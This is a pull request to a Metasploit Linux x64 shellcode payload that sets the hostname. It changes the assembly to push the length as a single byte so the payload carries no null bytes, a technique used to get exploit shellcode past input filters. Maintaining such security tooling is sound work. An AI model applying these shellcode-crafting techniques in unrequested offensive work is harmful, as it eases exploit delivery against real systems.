### PR TITLE
payload/linux/x64/set_hostname -  Avoid null bytes using push byte #{length} instead of push #{length}

### DIFF
--- a/modules/payloads/singles/linux/x64/set_hostname.rb
+++ b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -49,7 +49,7 @@ module MetasploitModule
       pop rdi    ; rdi points to the hostname string.
       xor byte [rdi+rsi], 0x41
       syscall
-      
+
       push 60    ; exit() syscall number.
       pop rax
       xor rdi,rdi

--- a/modules/payloads/singles/linux/x64/set_hostname.rb
+++ b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -44,12 +44,12 @@ module MetasploitModule
       jmp str
 
     end:
-      push #{length}
+      dw 0x#{length.to_s(16)}6a ; push byte length
       pop rsi
       pop rdi    ; rdi points to the hostname string.
       xor byte [rdi+rsi], 0x41
       syscall
-
+      
       push 60    ; exit() syscall number.
       pop rax
       xor rdi,rdi


### PR DESCRIPTION
Hello, pushing big numbers like 250 causes null bytes. So, I thought using `push byte` will be better for avoiding null-bytes. Since sethostname syscall doesn't take more than maximum value of byte as length, I think it'll be safe to use.  